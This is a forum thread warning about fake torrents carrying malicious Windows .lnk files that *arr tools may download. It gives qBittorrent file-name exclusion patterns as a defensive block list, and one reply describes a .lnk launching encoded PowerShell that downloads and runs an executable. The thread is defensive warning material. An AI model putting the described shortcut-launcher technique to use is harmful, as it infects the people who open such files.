There are some torrrents showing up with .lnkextension (ex: movie.mp3.lnk, tvshow.mkv.lnk…) and automated software (Sonarr, Radarr, Lidarr, qBittorrent RSS Downloader) could pick those torrents (but not import).

These (fake) torrents include a .lnk file that executes a script on your Windows


HOW TO exclude from download on qBittorrent.

  • Go to Options -> Downloads

  • Enable “Exclude file names”

  • Add patterns:

(one by line)

*.mp4.lnk  
*.mp3.lnk  
*.mkv.lnk
*.torrent.lnk 
*.zipx
*.scr
*.arj
*.lzh

Or exclude all together: *.lnk


Example on VirusTotal https://www.virustotal.com/gui/file/e74f64df6ebaf3a1b6e3f42591eb6e87d2ac2828eb5a99fd8d3d82c140137fc9/detection

    • ad_on_is@lemm.ee
      link
      fedilink
      English
      arrow-up
      4
      ·
      edit-2
      1 year ago

      Microsoft: De nada, amigo! Oh… here’s an ad, btw… and…did you enable Recall already?

      • ReversalHatchery@beehaw.org
        link
        fedilink
        English
        arrow-up
        1
        ·
        1 year ago

        or rather: oh silly you were so clumsy that you disabled recall by accident again. let us be so kind to re-enable it for you

    • wizardbeard@lemmy.dbzer0.com
      link
      fedilink
      English
      arrow-up
      4
      ·
      edit-2
      1 year ago

      Yes, but also whoever set the defaults for the *arr tools. Why would any filename with extra shit past the extensions you’re looking for be considered an acceptable result?

      Tack $ on the end of your regex, for fucks sake.

  • N0x0n@lemmy.ml
    link
    fedilink
    English
    arrow-up
    4
    ·
    edit-2
    1 year ago

    For those interested, John Hammond did a video a few months ago about .lnk extension (and other 16 hidden extensions on Windows).

    He doesn’t go to much or to deep into the subject, but you get a general view how this could be exploitable.

    YouTube link

    Piped Link

    • American_Jesus@lemm.eeOP
      link
      fedilink
      English
      arrow-up
      3
      ·
      1 year ago

      Sonarr will still pick the release and download GBs of malware, and if you don’t notice your download directly is filled with GBs of fake torrents

      • Petter1@lemm.ee
        link
        fedilink
        English
        arrow-up
        1
        ·
        8 months ago

        We just deleted those failed to import periodically with an automation 😁

      • LiveLM@lemmy.zip
        link
        fedilink
        English
        arrow-up
        2
        ·
        edit-2
        1 year ago

        Weak.
        Harbor disaster. Seed the malware. Spread the fruits of chaos amongst the unworthy. Be complicit in their downfall. Feed on their agony ^^/s

        • American_Jesus@lemm.eeOP
          link
          fedilink
          English
          arrow-up
          1
          ·
          edit-2
          1 year ago

          Not these ones, some could have more than 1GB, look at the virustotal link, the file had 422MB.

          Also Sonarr/Radarr filter torrents by size

          Here some examples
          https://bt4gprx.com/search?q=The.Lord.of.The.Rings.The.Rings.of.Power.S02E08

          Those where posted on 1337x (and removed) and probably other sites, Sonarr can pick those based on release name and torrent size

          PS: had to rename the fine from .lnk to .com so virustotal could accept

          • catloaf@lemm.ee
            link
            fedilink
            English
            arrow-up
            1
            ·
            1 year ago

            Anyone paying attention to size would probably also notice they’re just .lnk files.

            • Aatube@kbin.melroy.org
              link
              fedilink
              arrow-up
              1
              ·
              1 year ago

              Not necessarily. Even with “hide extensions” unchecked, Windows hides the .lnk extension by default; it just shows an arrow in the bottom-right corner of the icon, which is plausibly missed when in the list view. I’m surprised antivirus doesn’t know about it already tbh.

  • Xianshi@lemm.ee
    link
    fedilink
    English
    arrow-up
    1
    ·
    1 year ago

    Nice one OP. Just had sonar pick up one of these today named like a proper release of a trusted group. Sonarr didn’t move it from qbit but better to not DL it in the first place even though its a linux box

  • Lojcs@lemm.ee
    link
    fedilink
    English
    arrow-up
    0
    ·
    1 year ago

    How is the link file executing malware? Can you put any shell script as the target?

    • teles@lemmy.eco.br
      link
      fedilink
      English
      arrow-up
      0
      ·
      1 year ago

      I am pretty sure a link file can open cmd/powershell with parameters to execute commands

      • montar@lemmy.ml
        link
        fedilink
        English
        arrow-up
        1
        ·
        1 year ago

        yep! I’ve found out browsing hacking/spamming site and i’ve found something too good to be true, it downloaded archive nested inside other archive and in it was silngle .lnk file leading to “the resource”. Peeking inside i’ve found powershell executing base64 (or base32?) encoded script (it’s got commandline option for that. if you want to ask wtf ask microsoft, and tell me), it dl’d some exe from some site and ran it, site was down alredy.

    • American_Jesus@lemm.eeOP
      link
      fedilink
      English
      arrow-up
      0
      ·
      1 year ago

      On many distros will open with WINE by default, not a big deal, you can just delete ~/.wine. If it does anything

      • kevincox@lemmy.ml
        link
        fedilink
        English
        arrow-up
        1
        ·
        8 months ago

        Wine will mount your root folder as a Windows drive by default. So if the malware is scanning all connected drives and encrypting/uploading them you still have a problem.